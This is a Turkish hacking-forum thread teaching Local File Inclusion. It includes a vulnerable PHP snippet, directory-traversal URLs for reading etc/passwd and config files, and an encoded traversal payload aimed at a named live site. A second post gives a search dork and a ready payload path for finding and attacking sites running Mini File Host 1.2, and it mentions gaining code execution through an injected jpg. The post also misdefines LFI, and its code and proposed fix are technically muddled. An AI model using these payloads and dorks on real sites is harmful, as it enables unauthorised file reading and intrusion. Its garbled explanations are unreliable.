LFI Local File İnclude // Sırf RFI Öğrenmeyin! Okuyun!

THE_MILLER

Katılımcı Üye
8 Ocak 2007
461
21
83
Italy // Roma
Rfi kadar işlevselliği olmayan ama her Hacker adayı için bilmesi gereken bir açık türü olan LFI yi anlatacağım.
THE_MILLER

1 ) LFI nedir ?
THE_MILLER

Lfı uzaktan servera dosya ekleme dahil etme anlamına gelir.

2 ) Rfi Kadar etkilimidir ?
THE_MILLER

Rfi kadar etkili olamasada yeterlidir.

Kullanımını Anlatayım

THE_MILLER
<?php
include ('data/$miller/function.php');
?>

burda gördünüz gibi rfi olarak düşünürsen miller
tanımlanmamış .

fakat bu lfi de shell olarak kullanılamaz tanımlanmayan degişken (miller)kullanılarak dosya okunabilir yukarıdaki kodu robot.php olarak kaydedin

Daha sonra

http://www.herhangisite.com/robot.php?miller=../../../TurkHackTeam

dosyası okunabilir izin varsa okunur bu
açıkla neler yapılır ?

etc/passwd , config okuruz ya da ftp alırız ...

LFI açığını Nasıl Kapatırız ?
THE_MILLER

<?php
$miller='sdwd'
include ('data/$miller/function.php');
?>
THE_MILLER

bu kod sayesinde açık kapaır çünkü miller 'i burda tanımladık


http://www.herhangisite.com/robot.php?miller=../../../TurkHackTEam



yaptığınız an LFI çalışmaz



Örnek LFI :

THE_MILLER





http://charlotte-wilson.net/view.php?list=..%2F..%2F..%20%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd



Not: Lfi açığı olan sisteme kod enjekte edilmiş bir jpg dosya atılarak server üzerinde işlem yapılabilir.



Bu döküman THE_MILLER 'e aittir izinsiz kullanımı yasaktır!



Saygılar // THE_MILLER for THT
 

THE_MILLER

Katılımcı Üye
8 Ocak 2007
461
21
83
Italy // Roma
Mini File Host = 1.2 LFI Vulnerability

ÖrnEk bir LFI açığı ve Kullanımınıda Vereyim :

Mini File Host = 1.2 LFI Vulnerability


AUTHOR : Scary-Boys
Download : http://galaxyscripts.com/forum/downloads.php?do=file&id=1
DorKs : "Powered By Mini File Host V1.2"
EXPLOIT : * https://tik.lat/K0NGJ [-LFI-]
Powered By Mini File Host V1.2 googlede arayın sonra buldugunuz sitenin sonuna
pages/upload.php?language=[LFI] benim bildigim tek LFI kod : ../../../../etc/passwd [LFI] yazan yeri silip bu kod yapıştırın
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.